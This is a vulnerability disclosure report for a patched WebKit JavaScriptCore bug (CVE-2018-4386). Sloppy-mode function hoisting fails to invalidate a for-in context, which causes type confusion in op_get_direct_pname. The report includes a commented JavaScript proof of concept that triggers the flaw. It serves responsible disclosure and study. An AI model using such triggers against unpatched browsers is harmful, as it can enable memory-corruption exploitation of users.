Issue metadata

Status: Fixed
Closed: Nov 29

Issue 1665: WebKit: JSC: BytecodeGenerator::hoistSloppyModeFunctionIfNecessary doesn't invalidate the ForInContext object.

Reported by lokihardt@google.com, Sep 13 Project Member

Issue description

This is similar to issue 1263. When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

PoC:
function trigger() {
    let o = {a: 1};
    for (var k in o) {            // k is tracked by a ForInContext
        {
            k = 0x1234;           // writes the block-scoped k created for the declaration below

            function k() {        // sloppy-mode hoisting copies block k (now 0x1234) into the outer var k,
                                  // but hoistSloppyModeFunctionIfNecessary never invalidates the ForInContext
            }
        }

        o[k];                     // still compiled as op_get_direct_pname, with k (an int, not a string) as the property name
    }
}

trigger();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
 

Comment 2 by lokihardt@google.com, Nov 29

Project Member
Labels: -Restrict-View-Commit CVE-2018-4386
Status: Fixed (was: New)
